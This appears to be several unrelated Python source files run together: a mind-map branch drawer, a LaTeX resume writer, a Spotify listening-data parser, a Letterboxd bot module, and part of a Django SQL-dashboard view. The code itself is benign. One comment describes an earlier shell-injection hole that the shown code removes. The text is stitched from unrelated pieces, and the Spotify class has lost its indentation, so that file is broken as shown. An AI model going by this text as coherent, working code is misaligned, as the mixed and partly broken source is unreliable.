            if direction == Direction.Left:
                x2 -= linewidth / 2
            elif direction == Direction.Right:
                x2 += linewidth / 2
            # Arc parameters depend on which side of the parent we are on.
            if direction == Direction.Left:
                a1 = 90
                da = -90
                dx1 = r1 * 2
                dx2 = r2 * 2
            else:
                a1 = da = 90
                dx1 = dx2 = 0
            x1 = jx
            if child is firstchild:
                # Top corner of the main branch.
                x1 += -r1 if direction == Direction.Left else r1
                if (corner_style == 'square' or abs(y2 - jy) < .001):
                    p1 = Vector2(jx, y2)
                    p2 = Vector2(jx, y2 + r1)
                    segments.insert(0, [p1, p2])
                    p1 = Vector2(x1, y2)
                    p2 = Vector2(jx, y2)
                    segments.insert(0, [p1, p2])
                elif corner_style == 'beveled':
                    p1 = Vector2(x1, y2)
                    p2 = Vector2(jx, y2 + r1)
                    segments.insert(0, [p1, p2])
                elif corner_style == 'rounded':
                    arc = arcpath(jx - dx1, y2, r1 * 2, r1 * 2, a1, da)
                    segments = arc + segments
                    p1 = Vector2(x2, y2)
                    p2 = Vector2(x1, y2)
                    segments.insert(0, [p1, p2])
            elif child is lastchild:
                # Bottom corner of the main branch.
                x1 += -r2 if direction == Direction.Left else r2
                if (corner_style == 'square' or abs(y2 - jy) < .001):
                    p1 = Vector2(jx, y2 - r2)
                    p2 = Vector2(jx, y2)
                    segments.append([p1, p2])
                    p1 = Vector2(jx, y2)
                    p2 = Vector2(x1, y2)
                    segments.append([p1, p2])
                elif corner_style == 'beveled':
                    p1 = Vector2(jx, y2 - r2)
                    p2 = Vector2(x1, y2)
                    segments.append([p1, p2])
                elif corner_style == 'rounded':
                    arc = arcpath(jx - dx2, y2 - r2 * 2, r2 * 2, r2 * 2,
                                  a1 + da, da)
                    segments = segments + arc
                    p1 = Vector2(x1, y2)
                    p2 = Vector2(x2, y2)
                    segments.append([p1, p2])
            else:
                # Middle children get a plain horizontal stub.
                _ctx.line(x1, y2, x2, y2)
        # Draw main branch path
        _ctx.nofill()
        path = createpath(_ctx, segments, close=False)
        _ctx.drawpath(path)
        # Draw junction point
        style = E('junctionStyle')
        if style == 'none':
            return
        r = E('junctionRadius')
        r2 = r / 2.
        _ctx.fill(E('junctionFillColor'))
        _ctx.stroke(E('junctionStrokeColor'))
        _ctx.strokewidth(E('junctionStrokeWidth'))
        if style == 'square':
            _ctx.rect(jx - r2, jy - r2, r, r)
        elif style == 'disc':
            _ctx.oval(jx - r2, jy - r2, r, r)
        elif style == 'diamond':
            _ctx.beginpath(jx, jy - r2)
            _ctx.lineto(jx + r2, jy)
            _ctx.lineto(jx, jy + r2)
            _ctx.lineto(jx - r2, jy)
            _ctx.lineto(jx, jy - r2)
            _ctx.endpath()
        # Draw junction sign
        sign = E('junctionSign')
        if sign == 'none':
            return
        _ctx.stroke(E('junctionSignColor'))
        d = E('junctionSignSize') / 2.
        _ctx.strokewidth(E('junctionSignStrokeWidth'))
        if sign in ('minus', 'plus'):
            _ctx.line(jx - d, jy, jx + d, jy)
        if sign == 'plus':
            _ctx.line(jx, jy - d, jx, jy + d)
# Registry mapping config style names to drawer classes.
_conndrawer_map = {
    'curve': CurveConnectionDrawer,
    'junction': JunctionConnectionDrawer
}

def conndrawer_by_name(name):
    """Look up a connection drawer class by its config name.

    Raises ValueError for unknown names.
    """
    try:
        return _conndrawer_map[name]
    except KeyError:
        # BUGFIX: use the Python 2/3 compatible raise form; the original
        # used the Python-2-only `raise ValueError, msg` syntax.
        raise ValueError('Unrecognized connection drawer name: %s' % name)
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 15 18:56:14 2016
@author: mark
"""
from api import *
# Handle to the open output document; must be set by the caller before
# write() is used.
file_writer = None
def write(text, process_text=True):
    """
    Write `text` to the output document, escaping LaTeX special
    characters unless `process_text` is False.
    """
    if process_text:
        # Escape LaTeX specials.
        # NOTE(review): the two '$' replacements below cancel each other
        # out ('\$' and '\\$' are the same two-character string), so '$'
        # is effectively left unescaped — confirm whether this is
        # intentional (e.g. to allow inline math).
        text = text.replace('%','\%')
        text = text.replace('&','\&')
        text = text.replace('$','\$')
        text = text.replace('\\$','$')
    file_writer.write(text)
def writeobj(obj, pref):
    """
    Render a Category, Task, or Point as LaTeX, recursing into children,
    and only emitting items that pass the document's desired-emphasis
    filter (pref.judge).
    obj = an item of Category, Task, or Point class
    pref = desired emphasis of the document
    Returns the LaTeX string, or '' when the item is filtered out.
    Raises Exception for unsupported object types.
    """
    if pref.judge(obj):
        # A Point returns immediately; Task/Category fall through to the
        # shared `return string` below.
        if isinstance(obj,Point):
            return r"\item[] " + obj.text
        elif isinstance(obj,Task):
            string = r"\headercondensed{%s}{%s}{%s}" % (obj.title,obj.entity,obj.dates)
            if obj.points != []:
                points_string = ''
                for point in obj.points:
                    points_string += writeobj(point,pref)
                if points_string: # valid points are identified
                    string += r"\begin{itemize}"
                    string += points_string
                    string += r"""\end{itemize}
                \vspace{0.5em}"""
        elif isinstance(obj,Category):
            string = r"\subsection*{%s}" % (obj.name)
            if obj.tasks != [] or obj.points != []:
                string += r"\begin{indentsection}{\parindent} \parskip=0.0em"
                if obj.tasks != []:
                    for task in obj.tasks:
                        string += writeobj(task,pref)
                if obj.points != []:
                    points_string = ''
                    for point in obj.points:
                        points_string += writeobj(point,pref)
                    if points_string: # valid points are identified
                        string += r"\begin{itemize}"
                        string += points_string
                        string += r"\end{itemize}"
                string+=r"""\end{indentsection}
            \vspace{-1em}"""
        else:
            raise Exception("the class passed to writeobj is not supported. the passed class is " + str(type(obj)))
        return string
    return ''
def output(text, tag_arg=''):
    """
    Write `text` to the document when `tag_arg` matches the active
    resume tags. `tag_arg` is either '' (always matches), a single tag
    string, or a list of acceptable tag strings.
    This method can be edited to output to specific files later.
    """
    matches = tag_arg == '' or check_match(tag_arg)
    if matches:
        write(text)
    # Validate the tag spelling even when it did not match.
    ensure_possible_tags(tag_arg)
def ensure_possible_tags(tag_arg):
    """
    Check that tag_arg only uses tags declared in possible_tags;
    raise an Exception otherwise.
    tag_arg - a string or list of strings
    """
    if isinstance(tag_arg, str):
        # Idiomatic membership test (the original used .count(...) == 0).
        if tag_arg not in possible_tags:
            raise Exception("Tag %s is not found in possible tags" %(tag_arg))
    elif isinstance(tag_arg,list):
        # Recurse to validate each tag in the list.
        for tag_name in tag_arg:
            ensure_possible_tags(tag_name)
def makeheader():
    """
    Return the LaTeX preamble for the resume document: documentclass,
    package imports, and custom commands/environments. In the future this
    may have some arguments for introducing extra Latex packages.
    """
    return r"""% resume.tex
% vim:set ft=tex spell:
\documentclass[10pt,letterpaper]{article}
\usepackage[letterpaper,margin=0.75in]{geometry}
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage{mdwlist}
\usepackage{textcomp}
\usepackage{tgpagella}
\usepackage{tabularx}
\pagestyle{empty}
\setlength{\tabcolsep}{0em}
\usepackage[version=4]{mhchem}
\usepackage[backend=biber,style=authoryear, bibstyle=authoryear, sorting = ynt]{biblatex}
\addbibresource{resume.bib}
% table spacing
\usepackage{enumitem}
\setlist{topsep=0.0em,itemsep=0.2em,parsep=0.0em}
% proper links
\usepackage[svgnames]{xcolor}
\usepackage[colorlinks]{hyperref}
\hypersetup{citecolor=DeepPink4}
\hypersetup{linkcolor=DarkRed}
\hypersetup{urlcolor=DarkBlue}
\usepackage{cleveref}
% indentsection style, used for sections that aren't already in lists
% that need indentation to the level of all text in the document
\newenvironment{indentsection}[1]%
{\begin{list}{}%
{\setlength{\leftmargin}{#1}}%
\item[]%
}
{\end{list}}
% possibly not used, remove
\newenvironment{projectsList}[1]%
{\subsection*{#1}
\begin{itemize}
\parskip=0.1em
}
{\end{itemize}}
% possibly not used, remove
\newcommand{\inputsec}[1]
{
\vspace{-1.5em}
\input{#1}
}
% format two pieces of text, one left aligned and one right aligned
\newcommand{\headerrow}[2]
{\begin{tabular*}{\linewidth}{l@{\extracolsep{\fill}}r}
#1 &
#2 \\
\end{tabular*}
}
% format three pieces of text, one left aligned, one center, and one right aligned
\newcommand{\headercondensed}[3]
{\begin{tabularx}{\linewidth}{lX<{\raggedleft}@{\hspace{2em}}p{4.5em}<{\raggedleft}}
\textbf{#1} & #2 & \emph{#3}
\end{tabularx}
}
% format intro with project, position, company, date
\newcommand{\itemintro}[4]
{
\headerrow
{\textbf{#1}}
{\textbf{#3}}
\\
\headerrow
{\emph{#2}}
{\emph{#4}}
}
% make "C++" look pretty when used in text by touching up the plus signs
\newcommand{\CPP}
{C\nolinebreak[4]\hspace{-.05em}\raisebox{.22ex}{\footnotesize\bf ++}}
"""
def begindocument():
    """Return the LaTeX line that opens the document body."""
    return "\\begin{document}\n"
def enddocument():
    """Return the LaTeX line that closes the document body."""
    return "\\end{document}\n"
|
import spotipy.util as util
import pandas as pd
import spotipy
from datetime import datetime
class SpotifyUtil:
'''
Utility class for accessing Spotify API
'''
query_dict = {
'current_user_recently_played': 'parse_songplays',
'current_user_top_artists': 'parse_top_artists',
'current_user_top_tracks': 'parse_top_tracks'
}
def __init__(self, username, client_id, client_secret, redirect_uri):
self.username = username
self.client_id = client_id
self.client_secret = client_secret
self.redirect_uri = redirect_uri
def get_spotify_data(self, scope, query, limit=50):
'''
Retrieves data from Spotify
'''
token = self.get_token(scope=scope)
spotify = self.get_connection(token=token)
json = getattr(spotify, query)(limit=limit)
self.df = getattr(self, self.query_dict[query])(data=json, spotify=spotify)
return self.df
def get_token(self, scope):
'''
Obtains the token for user authorization
'''
token = util.prompt_for_user_token(username=self.username,
scope=scope,
client_id=self.client_id,
client_secret=self.client_secret,
redirect_uri=self.redirect_uri)
return token
def get_connection(self, token):
'''
Sets up the Spotify Connection
'''
spotify = spotipy.Spotify(auth=token)
return spotify
def parse_json(self, data, columns, *args, **kwargs):
'''
Parses response data in JSON format
'''
if not (kwargs.get('result_key')==None):
data = data[kwargs['result_key']]
df = pd.json_normalize(data).reset_index()
df['index'] = df['index'] + 1
df = df[columns.keys()].rename(columns=columns)
return df
def parse_primary_other(self, parse_list=[]):
'''
Parses primary and other values for lists
'''
parse_list = parse_list.copy()
try:
primary = parse_list.pop(0)
except IndexError:
primary = None
others = ", ".join(parse_list)
return primary, others
def parse_songplays(self, data, spotify, columns=None):
'''
Parses songplays data of user
'''
if columns is None:
columns = {
'index': 'songplays_id',
'track.id': 'track_id',
'track.name': 'track_name',
'track.artists': 'artists',
'track.duration_ms' : 'track_duration',
'track.explicit': 'track_is_explicit',
'track.popularity': 'track_popularity',
'played_at': 'track_played_at',
'track.album.id': 'album_id',
'track.album.name': 'album_name',
'track.album.release_date': 'album_release_year',
'track.album.type': 'album_type'
}
songplays = self.parse_json(data=data, columns=columns, result_key='items')
# Parse artists
def parse_artist(artists):
# parse primary and other artists
artist_name, artist_name_others = self.parse_primary_other([artist['name'] for artist in artists])
artist_id, artist_id_others = self.parse_primary_other([artist['id'] for artist in artists])
return artist_name, artist_name_others, artist_id, artist_id_others
(songplays['artist_name'], songplays['artist_name_others'],
songplays['artist_id'], songplays['artist_id_others']) = zip(*songplays['artists'].apply(parse_artist))
# Get release year
def parse_year(album_release_year):
try:
year = datetime.strptime(album_release_year, '%Y-%m-%d').year
except (ValueError, NameError):
year = datetime.strptime(album_release_year, '%Y').year
return year
songplays['album_release_year'] = songplays['album_release_year'].apply(lambda x: parse_year(x))
# Convert timestamp
try:
songplays['track_played_at'] = songplays['track_played_at'] \
.apply(lambda x: pd.Timestamp(x).strftime('%Y-%m-%d %H:%M:%S'))
except KeyError:
pass
#Convert track duration
songplays['track_duration'] = songplays['track_duration'].apply(lambda x: x/60000)
# Get features
def get_features(key, method, df, columns, result_key=None):
features = getattr(spotify, method)(df[key].values.tolist())
features_df = self.parse_json(data=features, columns=columns, result_key=result_key)
features_df.drop_duplicates(subset=key, inplace=True)
df = df.merge(features_df, how='left', on=key)
return df
# Get track features
track_features_columns = {
'id': 'track_id',
'danceability': 'track_danceability',
'energy': 'track_energy',
'key': 'track_key',
'loudness': 'track_loudness',
'mode': 'track_mode',
'speechiness': 'track_speechiness',
'acousticness': 'track_acousticness',
'instrumentalness': 'track_instrumentalness',
'liveness': 'track_liveness',
'valence': 'track_valence'
}
songplays = get_features(key='track_id',
method='audio_features',
df=songplays,
columns=track_features_columns)
# Get artist features
artist_features_columns = {
'id': 'artist_id',
'genres': 'artist_genres',
'popularity': 'artist_popularity',
'followers.total': 'artist_followers'
}
songplays = get_features(key='artist_id',
method='artists',
df=songplays,
columns=artist_features_columns,
result_key='artists')
# Parse genres
(songplays['artist_genre'],
songplays['artist_genre_others']) = zip(*songplays['artist_genres'].apply(self.parse_primary_other))
songplays.drop(columns=['artist_genres', 'artists'], axis=1, inplace=True)
return songplays
def parse_top_artists(self, data, spotify):
    '''
    Parses top artists of user
    '''
    # Map raw Spotify API fields onto our column names.
    field_map = {
        'index': 'artist_rank',
        'id': 'artist_id',
        'name': 'artist_name',
        'genres': 'artist_genres',
        'popularity': 'artist_popularity',
        'followers.total': 'artist_followers'
    }
    artists_df = self.parse_json(data=data, columns=field_map, result_key='items')
    # Split each genre list into a primary genre plus the remainder.
    (artists_df['artist_genre'],
     artists_df['artist_genre_others']) = zip(
        *artists_df['artist_genres'].apply(self.parse_primary_other))
    artists_df.drop(columns=['artist_genres'], axis=1, inplace=True)
    return artists_df
def parse_top_tracks(self, data, spotify):
    '''
    Parses top tracks of user
    '''
    # Column mapping from the raw Spotify payload to songplay fields;
    # the heavy lifting is delegated to parse_songplays.
    field_map = {
        'index': 'track_rank',
        'id': 'track_id',
        'name': 'track_name',
        'artists': 'artists',
        'duration_ms': 'track_duration',
        'explicit': 'track_is_explicit',
        'popularity': 'track_popularity',
        'album.id': 'album_id',
        'album.name': 'album_name',
        'album.release_date': 'album_release_year',
        'album.type': 'album_type'
    }
    return self.parse_songplays(data=data, spotify=spotify, columns=field_map)
<gh_stars>0
import os
import subprocess
from api import api_call, post_call
from config import SETTINGS
from helpers import create_embed, LetterboxdError
async def user_embed(username):
    """Build an embed summarising a Letterboxd member's profile."""
    # Letterboxd usernames are case-insensitive; normalise once up front.
    username = username.lower()
    profile_url = 'https://letterboxd.com/{}'.format(username)
    member_id = __check_if_fixed_search(username)
    if not member_id:
        member_id = await __search_profile(username)
    member_json = await __get_userjson(member_id)
    display_name, avatar_url, description = await __get_infos(member_json, member_id)
    # Append the favourite-films markdown to the description text.
    fav_text, fav_posters_link = __get_favs(member_json)
    return create_embed(display_name, profile_url, description + fav_text, avatar_url)
async def user_details(username):
    """Resolve a username to (username, display name, Letterboxd id, avatar URL)."""
    username = username.lower()
    member_id = __check_if_fixed_search(username)
    if not member_id:
        member_id = await __search_profile(username)
    member_json = await __get_userjson(member_id)
    # Stats are not needed here, only identity information.
    display_name, avatar_url, _ = await __get_infos(member_json, member_id, False)
    return username, display_name, member_id, avatar_url
def __check_if_fixed_search(username):
    """Return the pinned Letterboxd id for *username*, or '' when not pinned."""
    pinned = (
        lbxd_id
        for fixed_name, lbxd_id in SETTINGS['fixed_user_search'].items()
        if fixed_name.lower() == username
    )
    return next(pinned, '')
async def __search_profile(username):
    """Page through the member search API until *username* matches exactly."""
    params = {
        'input': username,
        'include': 'MemberSearchItem',
        'perPage': '100'
    }
    while True:
        response = await api_call('search', params)
        items = response['items']
        if not items:
            break
        # Look for an exact (case-insensitive) username match on this page.
        match = next(
            (item['member']['id'] for item in items
             if item['member']['username'].lower() == username),
            None,
        )
        if match:
            return match
        cursor = response.get('next')
        if not cursor:
            break
        params['cursor'] = cursor
    raise LetterboxdError('The user **' + username + '** wasn\'t found.')
async def __get_userjson(lbxd_id):
    """Fetch the member JSON; raise when the member is unreachable via the API."""
    member_response = await api_call('member/{}'.format(lbxd_id))
    if member_response != '':
        return member_response
    raise LetterboxdError(
        'The user wasn\'t found. ' +
        'They may have refused to be reachable via the API.')
async def __get_infos(member_json, lbxd_id, with_stats=True):
    """Extract display name, avatar URL and a short markdown description.

    When *with_stats* is true an extra statistics API call adds the
    film-watch count to the description.
    Returns (display_name, avatar_url, description).
    """
    # Fix: removed leftover debug `print(member_json['id'])` that spammed stdout.
    display_name = member_json['displayName']
    # Avatar sizes appear in ascending order; take the largest one.
    avatar_url = member_json['avatar']['sizes'][-1]['url']
    description = '**'
    if member_json.get('location'):
        description += member_json['location'] + '** -- **'
    if with_stats:
        stats_json = await api_call('member/{}/statistics'.format(lbxd_id))
        description += str(stats_json['counts']['watches']) + ' films**\n'
    return display_name, avatar_url, description
def __get_favs(member_json):
    """Format the member's favourite films as markdown links.

    Returns (description, poster_links) where poster_links holds the URLs
    of mid-sized posters (151-249 px wide).
    """
    lines = []
    fav_posters_link = []
    for fav_film in member_json['favoriteFilms']:
        fav_name = fav_film['name']
        if fav_film.get('poster'):
            fav_posters_link.extend(
                size['url'] for size in fav_film['poster']['sizes']
                if 150 < size['width'] < 250
            )
        if fav_film.get('releaseYear'):
            fav_name += ' (' + str(fav_film['releaseYear']) + ')'
        # Keep the last 'letterboxd'-type link, as the original loop did.
        for link in fav_film['links']:
            if link['type'] == 'letterboxd':
                fav_url = link['url']
        lines.append('[{0}]({1})\n'.format(fav_name, fav_url))
    return ''.join(lines), fav_posters_link
async def __upload_fav_posters(username, fav_posters_link):
    """Download favourite-film posters, stitch them side by side with
    ImageMagick's `convert`, upload the composite to Cloudinary and return
    its URL.

    Security fix: the original built shell command lines from *username*
    (`os.popen('mkdir ' + username)`, `subprocess.call(..., shell=True)`,
    `os.popen('rm -r ' + username)`), allowing shell injection; os.popen is
    also asynchronous, racing with the file writes below.
    """
    import shutil

    # Download posters into a per-user scratch directory.
    os.makedirs(username, exist_ok=True)
    convert_args = ['convert']
    for index, fav_poster in enumerate(fav_posters_link):
        img_data = await api_call(fav_poster, None, False, False)
        temp_fav = '{0}/fav{1}.jpg'.format(username, index)
        convert_args.append(temp_fav)
        with open(temp_fav, 'wb') as handler:
            handler.write(img_data)
    # Stitch posters horizontally; argv is passed as a list (shell=False)
    # so a crafted username cannot inject shell commands.
    convert_args += ['+append', '{}/fav.jpg'.format(username)]
    subprocess.call(convert_args)
    with open('{}/fav.jpg'.format(username), 'rb') as pic:
        bin_pic = pic.read()
    # Remove the scratch directory synchronously before uploading.
    shutil.rmtree(username, ignore_errors=True)
    # Upload to Cloudinary
    upload_url = 'https://api.cloudinary.com/v1_1/'
    upload_url += SETTINGS['cloudinary']['cloud_name'] + '/image/upload'
    params = {'file': bin_pic,
              'upload_preset': SETTINGS['cloudinary']['preset']}
    result = await post_call(upload_url, params)
    return result['url']
|
import csv
import hashlib
import re
import time
from io import StringIO
from urllib.parse import urlencode
from django.conf import settings
from django.contrib.auth.decorators import permission_required
from django.db import connections
from django.db.utils import ProgrammingError
from django.forms import CharField, ModelForm, Textarea
from django.http.response import (
HttpResponseForbidden,
HttpResponseRedirect,
StreamingHttpResponse,
)
from django.shortcuts import get_object_or_404, render
from .models import Dashboard
from .utils import (
check_for_base64_upgrade,
displayable_rows,
extract_named_parameters,
sign_sql,
unsign_sql,
)
# https://github.com/simonw/django-sql-dashboard/issues/58
MAX_REDIRECT_LENGTH = 1800
class SaveDashboardForm(ModelForm):
    """Form used on the index page to save the current SQL queries as a
    named Dashboard (rendered with the "_save" prefix)."""

    # Override the model field so the slug is optional in the form and shown
    # with a friendlier label.
    slug = CharField(required=False, label="URL", help_text='For example "daily-stats"')

    class Meta:
        model = Dashboard
        fields = (
            "title",
            "slug",
            "description",
            "view_policy",
            "view_group",
            "edit_policy",
            "edit_group",
        )
        widgets = {
            "description": Textarea(
                attrs={
                    "placeholder": "Optional description, shown at the top of the dashboard page"
                }
            )
        }
@permission_required("django_sql_dashboard.execute_sql")
def dashboard_index(request):
    """Interactive SQL editor view.

    POST handles three cases: exporting one query's full results, saving the
    current queries as a dashboard, and converting raw SQL into signed ?sql=
    parameters (redirecting to GET when the URL is short enough).  GET
    verifies the signatures and renders the queries via _dashboard_index.
    """
    sql_queries = []
    too_long_so_use_post = False
    save_form = SaveDashboardForm(prefix="_save")
    if request.method == "POST":
        # Is this an export?
        if any(
            k for k in request.POST.keys() if k.startswith("export_")
        ) and request.user.has_perm("django_sql_dashboard.execute_sql"):
            if not getattr(settings, "DASHBOARD_ENABLE_FULL_EXPORT", None):
                return HttpResponseForbidden("The export feature is not enabled")
            return export_sql_results(request)
        sqls = [sql for sql in request.POST.getlist("sql") if sql.strip()]
        saving = False
        # How about a save?
        if request.POST.get("_save-slug"):
            save_form = SaveDashboardForm(request.POST, prefix="_save")
            saving = True
            if save_form.is_valid():
                dashboard = save_form.save(commit=False)
                dashboard.owned_by = request.user
                dashboard.save()
                for sql in sqls:
                    dashboard.queries.create(sql=sql)
                return HttpResponseRedirect(dashboard.get_absolute_url())
        # Convert ?sql= into signed values and redirect as GET
        other_pairs = [
            (key, value)
            for key, value in request.POST.items()
            if key not in ("sql", "csrfmiddlewaretoken")
            and not key.startswith("_save-")
        ]
        signed_sqls = [sign_sql(sql) for sql in sqls if sql.strip()]
        params = {
            "sql": signed_sqls,
        }
        params.update(other_pairs)
        redirect_path = request.path + "?" + urlencode(params, doseq=True)
        # Is this short enough for us to redirect?
        too_long_so_use_post = len(redirect_path) > MAX_REDIRECT_LENGTH
        if not saving and not too_long_so_use_post:
            return HttpResponseRedirect(redirect_path)
        else:
            # Fall through and render directly from the POSTed queries.
            sql_queries = sqls
    unverified_sql_queries = []
    for signed_sql in request.GET.getlist("sql"):
        sql, signature_verified = unsign_sql(signed_sql)
        if signature_verified:
            sql_queries.append(sql)
        else:
            # Tampered/unsigned queries are shown as warnings, never executed.
            unverified_sql_queries.append(sql)
    if getattr(settings, "DASHBOARD_UPGRADE_OLD_BASE64_LINKS", None):
        redirect_querystring = check_for_base64_upgrade(sql_queries)
        if redirect_querystring:
            return HttpResponseRedirect(request.path + redirect_querystring)
    return _dashboard_index(
        request,
        sql_queries,
        unverified_sql_queries=unverified_sql_queries,
        too_long_so_use_post=too_long_so_use_post,
        extra_context={"save_form": save_form},
    )
def _dashboard_index(
    request,
    sql_queries,
    unverified_sql_queries=None,
    title=None,
    description=None,
    dashboard=None,
    too_long_so_use_post=False,
    template="django_sql_dashboard/dashboard.html",
    extra_context=None,
):
    """Execute *sql_queries* against the dashboard DB alias and render them.

    Shared by the interactive editor (dashboard_index) and saved dashboards
    (dashboard).  Every query runs inside a transaction that is always rolled
    back, so dashboards can never mutate data.
    """
    query_results = []
    alias = getattr(settings, "DASHBOARD_DB_ALIAS", "dashboard")
    row_limit = getattr(settings, "DASHBOARD_ROW_LIMIT", None) or 100
    connection = connections[alias]
    # Introspect the public schema so the template can offer a table browser.
    with connection.cursor() as tables_cursor:
        tables_cursor.execute(
            """
            with visible_tables as (
              select table_name
                from information_schema.tables
                where table_schema = 'public'
                order by table_name
            )
            select
              information_schema.columns.table_name,
              string_agg(column_name, ', ' order by ordinal_position) as columns
            from
              information_schema.columns
            join
              visible_tables on
              information_schema.columns.table_name = visible_tables.table_name
            where
              information_schema.columns.table_schema = 'public'
            group by
              information_schema.columns.table_name
            order by
              information_schema.columns.table_name
            """
        )
        available_tables = [
            {"name": t[0], "columns": t[1]} for t in tables_cursor.fetchall()
        ]
    # Collect distinct %(name)s parameters across all queries; record per-query
    # extraction errors in parallel with sql_queries.
    parameters = []
    sql_query_parameter_errors = []
    for sql in sql_queries:
        try:
            extracted = extract_named_parameters(sql)
            for p in extracted:
                if p not in parameters:
                    parameters.append(p)
            # False == "no parameter problem" for this query.
            sql_query_parameter_errors.append(False)
        except ValueError as e:
            if "%" in sql:
                sql_query_parameter_errors.append(
                    r"Invalid query - try escaping single '%' as double '%%'"
                )
            else:
                sql_query_parameter_errors.append(str(e))
    # Parameter values may arrive via POST or GET; "sql" itself is reserved.
    parameter_values = {
        parameter: request.POST.get(parameter, request.GET.get(parameter, ""))
        for parameter in parameters
        if parameter != "sql"
    }
    extra_qs = "&{}".format(urlencode(parameter_values)) if parameter_values else ""
    results_index = -1
    if sql_queries:
        for sql, parameter_error in zip(sql_queries, sql_query_parameter_errors):
            results_index += 1
            sql = sql.strip().rstrip(";")
            # Template for any error outcome of this query.
            base_error_result = {
                "index": str(results_index),
                "sql": sql,
                "textarea_rows": min(5, len(sql.split("\n"))),
                "rows": [],
                "row_lists": [],
                "description": [],
                "columns": [],
                "column_details": [],
                "truncated": False,
                "extra_qs": extra_qs,
                "error": None,
                "templates": ["django_sql_dashboard/widgets/error.html"],
            }
            if parameter_error:
                query_results.append(
                    dict(
                        base_error_result,
                        error=parameter_error,
                    )
                )
                continue
            # A trailing ";" was stripped above, so any remaining ";" means
            # multiple statements — rejected.
            if ";" in sql:
                query_results.append(
                    dict(base_error_result, error="';' not allowed in SQL queries")
                )
                continue
            with connection.cursor() as cursor:
                duration_ms = None
                try:
                    cursor.execute("BEGIN;")
                    start = time.perf_counter()
                    # Running a SELECT prevents future SET TRANSACTION READ WRITE:
                    cursor.execute("SELECT 1;")
                    cursor.fetchall()
                    cursor.execute(sql, parameter_values)
                    try:
                        # Fetch one extra row so truncation can be detected.
                        rows = list(cursor.fetchmany(row_limit + 1))
                    except ProgrammingError as e:
                        # Statement produced no result set; surface its status
                        # message as a single pseudo-row instead.
                        rows = [{"statusmessage": str(cursor.statusmessage)}]
                    duration_ms = (time.perf_counter() - start) * 1000.0
                except Exception as e:
                    query_results.append(dict(base_error_result, error=str(e)))
                else:
                    templates = ["django_sql_dashboard/widgets/default.html"]
                    columns = [c.name for c in cursor.description]
                    # A custom widget template named after the sorted column
                    # names takes precedence over the default table widget.
                    template_name = ("-".join(sorted(columns))) + ".html"
                    if len(template_name) < 255:
                        templates.insert(
                            0,
                            "django_sql_dashboard/widgets/" + template_name,
                        )
                    display_rows = displayable_rows(rows[:row_limit])
                    column_details = [
                        {"name": column, "is_unambiguous": columns.count(column) == 1}
                        for column in columns
                    ]
                    query_results.append(
                        {
                            "index": str(results_index),
                            "sql": sql,
                            "textarea_rows": len(sql.split("\n")),
                            "rows": [dict(zip(columns, row)) for row in display_rows],
                            "row_lists": display_rows,
                            "description": cursor.description,
                            "columns": columns,
                            "column_details": column_details,
                            "truncated": len(rows) == row_limit + 1,
                            "extra_qs": extra_qs,
                            "duration_ms": duration_ms,
                            "templates": templates,
                        }
                    )
                finally:
                    # Dashboards are strictly read-only: always roll back.
                    cursor.execute("ROLLBACK;")
    # Page title, composed of truncated SQL queries
    html_title = "SQL Dashboard"
    if sql_queries:
        html_title = "SQL: " + " [,] ".join(sql_queries)
    if dashboard and dashboard.title:
        html_title = dashboard.title
    # Add named parameter values, if any exist
    provided_values = {
        key: value for key, value in parameter_values.items() if value.strip()
    }
    if provided_values:
        if len(provided_values) == 1:
            html_title += ": {}".format(list(provided_values.values())[0])
        else:
            html_title += ": {}".format(
                ", ".join(
                    "{}={}".format(key, value) for key, value in provided_values.items()
                )
            )
    user_can_execute_sql = request.user.has_perm("django_sql_dashboard.execute_sql")
    saved_dashboards = []
    if not dashboard:
        # Only show saved dashboards on index page
        saved_dashboards = [
            (dashboard, dashboard.user_can_edit(request.user))
            for dashboard in Dashboard.get_visible_to_user(request.user).select_related(
                "owned_by", "view_group", "edit_group"
            )
        ]
    context = {
        "title": title or "SQL Dashboard",
        "html_title": html_title,
        "query_results": query_results,
        "unverified_sql_queries": unverified_sql_queries,
        "available_tables": available_tables,
        "description": description,
        "dashboard": dashboard,
        "saved_dashboard": bool(dashboard),
        "user_owns_dashboard": dashboard and request.user == dashboard.owned_by,
        "user_can_edit_dashboard": dashboard and dashboard.user_can_edit(request.user),
        "user_can_execute_sql": user_can_execute_sql,
        "user_can_export_data": getattr(settings, "DASHBOARD_ENABLE_FULL_EXPORT", None)
        and user_can_execute_sql,
        "parameter_values": parameter_values.items(),
        "too_long_so_use_post": too_long_so_use_post,
        "saved_dashboards": saved_dashboards,
    }
    if extra_context:
        context.update(extra_context)
    response = render(
        request,
        template,
        context,
    )
    if request.user.is_authenticated:
        # Authenticated results may contain private data; keep out of shared caches.
        response["cache-control"] = "private"
    response["Content-Security-Policy"] = "frame-ancestors 'self'"
    return response
def dashboard(request, slug):
    """Render a saved dashboard after enforcing its view_policy."""
    dashboard = get_object_or_404(Dashboard, slug=slug)
    user = request.user
    owner = dashboard.owned_by
    policies = Dashboard.ViewPolicies

    def can_view():
        # Unknown/public policies fall through to "allowed".
        policy = dashboard.view_policy
        if policy == policies.PRIVATE:
            return user == owner
        if policy == policies.LOGGEDIN:
            return user.is_authenticated
        if policy == policies.GROUP:
            return user.is_authenticated and (
                user == owner
                or user.groups.filter(pk=dashboard.view_group_id).exists()
            )
        if policy == policies.STAFF:
            return user.is_authenticated and (user == owner or user.is_staff)
        if policy == policies.SUPERUSER:
            return user.is_authenticated and (user == owner or user.is_superuser)
        return True

    if not can_view():
        denied = HttpResponseForbidden("You cannot access this dashboard")
        # Forbidden responses are per-user; keep them out of shared caches.
        denied["cache-control"] = "private"
        return denied
    return _dashboard_index(
        request,
        sql_queries=[query.sql for query in dashboard.queries.all()],
        title=dashboard.title,
        description=dashboard.description,
        dashboard=dashboard,
        template="django_sql_dashboard/saved_dashboard.html",
    )
# Collapses every non-alphanumeric character when deriving an export filename.
non_alpha_re = re.compile(r"[^a-zA-Z0-9]")


def export_sql_results(request):
    """Stream the full results of one POSTed SQL query as a CSV/TSV download.

    The export button name encodes the format and which query to run, e.g.
    "export_csv_0".  Uses a named (server-side) cursor so rows stream in
    batches instead of being loaded into memory.
    """
    export_key = [k for k in request.POST.keys() if k.startswith("export_")][0]
    _, format, sql_index = export_key.split("_")
    assert format in ("csv", "tsv")
    sqls = request.POST.getlist("sql")
    sql = sqls[int(sql_index)]
    parameter_values = {
        parameter: request.POST.get(parameter, "")
        for parameter in extract_named_parameters(sql)
    }
